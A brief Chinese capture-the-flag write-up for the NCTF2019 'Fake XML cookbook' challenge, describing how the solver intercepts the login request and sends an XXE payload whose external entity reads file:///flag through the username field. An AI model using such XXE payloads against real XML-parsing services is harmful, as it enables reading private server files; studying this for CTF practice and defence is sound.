[NCTF2019]Fake XML cookbook1

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
JustNow_Man2 天前
【Claude Code】 中给 Python + XML 项目建立可靠验证体系
xml·linux·python
AI产品实战3 天前
Gradle打包生成dependencies.xml详解
xml·java·gradle
斯特凡今天也很帅5 天前
xml页面可以打开,不报错,但是显示数据的地方也不显示,我是怎么解决的
xml·vue.js
前网易架构师-高司机5 天前
带标注的21种中药材识别数据集,识别率73.8%数据集,2237张图,支持yolo,coco json,voc xml,文末有模型训练代码
xml·yolo·json·数据集·中药·药材·中草药
snow@li6 天前
Java:pom.xml全景深度分析 / 机制、标签、依赖、打包、生产避坑全解 / 工程基石
xml·java·开发语言
田里的水稻6 天前
EP_XML\JSON配置文件和YAML
xml·运维·人工智能·机器人·自动驾驶·json
xiangji6 天前
开源完美模块组件化可扩展的Xml解析器Hand.ParseXml
xml·模块化·组件化·可扩展
我命由我123458 天前
Android 构建项目问题:XML 片段出错,com.ctc.wstx.exc.WstxUnexpectedCharException
android·xml·android studio·android jetpack·android-studio·android runtime
PixelBai9 天前
JSON转XML使用教程:从入门到精通
xml·json
脑子运行超载12 天前
Jackson处理和mybatis的xml转换问题
xml·jackson·mybatis·javatype